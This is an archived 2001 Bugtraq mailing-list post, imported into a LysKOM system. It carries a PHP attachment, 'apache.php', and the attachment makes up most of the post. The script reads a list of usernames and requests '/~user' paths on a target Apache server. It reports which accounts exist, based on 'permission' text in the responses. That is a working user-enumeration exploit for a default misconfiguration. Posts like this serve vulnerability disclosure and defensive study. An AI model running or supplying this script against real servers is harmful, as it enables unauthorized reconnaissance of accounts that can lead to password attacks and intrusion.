7152067 2001-09-20 22:27 -0300  /3 rader/ gabriel maggiotti <gmaggiot@ciudad.com.ar>
Sänt av: joel@lysator.liu.se
Importerad: 2001-09-21  19:23  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <19260>
Ärende: script to find apache users
------------------------------------------------------------

(7152067) /gabriel maggiotti <gmaggiot@ciudad.com.ar>/
Bilaga (text/plain) i text 7152068
7152068 2001-09-20 22:27 -0300  /44 rader/ gabriel maggiotti <gmaggiot@ciudad.com.ar>
Bilagans filnamn: "apache.php"
Importerad: 2001-09-21  19:23  av Brevbäraren
Extern mottagare: bugtraq@securityfocus.com
Mottagare: Bugtraq (import) <19261>
Bilaga (text/plain) till text 7152067
Ärende: Bilaga (apache.php) till: script to find apache users
------------------------------------------------------------
#!/usr/local/bin/php -q
<?
/*
default misconfiguration which could allow remote users
to determine whether a give username exists on the vulnerable system.

        By Gabriel A Maggiotti
 */


	if( $argc!=4)
	{
	echo "usagge: $argv[0] <host> <userlist> <delay>\n";
	return 1;
	}


$host=$argv[1];
$userlist=$argv[2];


$fd = fopen ($userlist, "r");
while (!feof ($fd)) {
	$user = fgets($fd, 4096);
                         
	$fp = fsockopen ($host, 80 , &$errno, &$errstr, 30);
	fputs ($fp, "GET /~$user HTTP/1.0\r\n\r\n");
	while (!feof ($fp)) {
		$sniff=fgets($fp,1024);
       	        if(strpos($sniff,"permission")!="") {
			echo "$user exists!!!\n";
			break;
		}
	}
	fclose ($fp);
	sleep(3);
}

fclose ($fd);

?>
(7152068) /gabriel maggiotti <gmaggiot@ciudad.com.ar>/